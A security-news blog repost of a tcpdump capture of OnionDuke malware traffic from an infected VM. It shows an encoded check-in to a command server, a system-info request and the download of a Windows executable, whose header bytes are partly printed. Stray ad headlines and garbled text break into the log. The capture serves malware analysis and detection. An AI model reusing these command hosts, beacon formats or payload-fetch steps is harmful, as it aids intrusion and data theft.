January 29th 2016

Download OnionDuke APT Malware : onionduke

1970-01-01 -4:-58:-32.468345 IP 10.0.2.15.1025 > 10.0.2.2.53: 56315+ A? rombeast.site50.net. (37)
E..A.q….”+
…
……5.-……………rombeast.site50.net…..
1970-01-01 -4:-58:-32.492920 IP 10.0.2.2.53 > 10.0.2.15.1025: 56315 1/2/0 A 31.170.162.243 (103)
E…./[email protected]+
…
….5…o\…………..rombeast.site50.net…………..X…………..Q….ns2
000webhost.com………Q….ns1.E
1970-01-01 -4:-58:-32.496438 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [S], seq 3752956870, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.r@…+.
……….P……..p…A………..
1970-01-01 -4:-58:-32.595297 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [S.], seq 64001, ack 3752956871, win 65535, options [mss 1460], length 0
E..,.0..@…….
….P……….`…W…….
1970-01-01 -4:-58:-32.595497 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [.], ack 1, win 64240, length 0
E..(.s@…+.
……….P……..P…tS……..
1970-01-01 -4:-58:-32.595729 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [P.], seq 1:289, ack 1, win 64240, length 288: HTTP: GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/QZnVg= HTTP/1.1
E..H.t@…*.
……….P……..P…R1..GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/QZnVg= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rombeast.site50.net
Cache-Control: no-cache

The Ultimate Guide to Cloud Gaming: D…
ØªØ¹Ù„Ù… Ø£Ø³Ø§Ø³ÙŠØ§Øª Ø§Ù„Ù‚Ø±Ø§Ø¡Ø…
Enter To Win A 12â€³ Outdoor Garden G…
Exclusive Launch Deal: HIMIWAY Electr…
Tips for College Students Who Want to…

1970-01-01 -4:-58:-32.595780 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [.], ack 289, win 65535, length 0
E..(.1..@…….
….P……….P…n$..
1970-01-01 -4:-58:-32.866662 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [P.], seq 1:1408, ack 289, win 65535, length 1407: HTTP: HTTP/1.1 200 OK
E…[email protected]….
….P……….P…….HTTP/1.1 200 OK
Date: Wed, 18 Dec 2013 03:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Length: 1243
Connection: close
Content-Type: text/html

1970-01-01 -4:-58:-32.875339 IP 10.0.2.15.1025 > 10.0.2.2.53: 6529+ A? www.226ers.es. (31)
E..;.w….”+
…
……5.’……………www.226ers.es…..
1970-01-01 -4:-58:-31.093371 IP 10.0.2.2.53 > 10.0.2.15.1025: 6529 1/3/0 A 208.113.199.191 (114)
E…[email protected].
…
….5…z.4………….www.226ers.es………….8@…q……….Q….ns1 dreamhost.com………Q….ns2.?……..Q….ns3.?
1970-01-01 -4:-58:-31.093919 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [S], seq 1505536384, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.x@…V.
….q…..PY…….p….H……….
1970-01-01 -4:-58:-31.181729 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [S.], seq 192001, ack 1505536385, win 65535, options [mss 1460], length 0
E..,[email protected]..
….P……Y…`….+……
1970-01-01 -4:-58:-31.184827 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [.], ack 1, win 64240, length 0
E..(.y@…V.
….q…..PY…….P………….
1970-01-01 -4:-58:-31.185054 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [P.], seq 1:147, ack 1, win 64240, length 146: HTTP: GET /sysinfo_7.php HTTP/1.1
E….z@…U.
….q…..PY…….P….B..GET /sysinfo_7.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.226ers.es
Cache-Control: no-cache

1970-01-01 -4:-58:-31.185134 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [.], ack 147, win 65535, length 0
E..([email protected]..
….P……Y…P….W..
1970-01-01 -4:-58:-31.274162 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [P.], seq 1:533, ack 147, win 65535, length 532: HTTP: HTTP/1.1 503 Service Temporarily Unavailable
E..<[email protected]..
….P……Y…P….W..HTTP/1.1 503 Service Temporarily Unavailable
Date: Wed, 18 Dec 2013 03:52:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

503 Service Temporarily Unavailable

Service Temporarily Unavailable

The server is temporarily unable to service your
request due to maintenance downtime or capacity
problems. Please try again later.

1970-01-01 -4:-58:-31.400301 IP 10.0.2.15.1050 > 31.170.162.243.80: Flags [P.], seq 1:163, ack 1, win 64240, length 162: HTTP: GET /forum/phpBB3/prx_26.php HTTP/1.1
E…..@…+.
……….P.1……P…….GET /forum/phpBB3/prx_26.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rombeast.site50.net
Cache-Control: no-cache

1970-01-01 -4:-58:-31.400374 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [.], ack 163, win 65535, length 0
E..(.<..@……. ….P…….1.rP…y… 1970-01-01 -4:-58:-31.610731 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [P.], seq 1:171, ack 163, win 65535, length 170: HTTP: HTTP/1.1 200 OK
E….=..@..=….
….P…….1.rP….d..HTTP/1.1 200 OK
Date: Wed, 18 Dec 2013 03:49:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

1970-01-01 -4:-58:-31.616302 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [.], seq 171:1591, ack 163, win 65535, length 1420: HTTP
E….>[email protected]….
….P…….1.rP…….27400
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………A…/D../D../D&..D../D…D../D…D../D…D../D…D../D…D../D…D1./D…D../D…D../D…D../DRich../D……..PE..L…!..R………..!..
………….%8…………………………………………….@……………………..>…….4..x………………………………………………………….H…@……………………………………..text…X……………………… ..`.rdata…_…….`………………@[email protected]….6…@………………….@….reloc..v-………..F…………[email protected]…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….U…E..V….X…t V.3……..^]………………A……………A…………..U…..H….R,P.E.P..]………………………U..V…………..E..t V……….^]……………………….U…F..M.;.s4…U.;.w+W..+….;F.u………F…t…….._.F..]…;F.u….c….F…t..M….F..]……………….I..A.+………U..j.h….d…[email protected]……..u…`….E……F…t.P.-…..

This post first appeared on Computer Security.org - CyberSecurity News, Inform, please read the originial post: here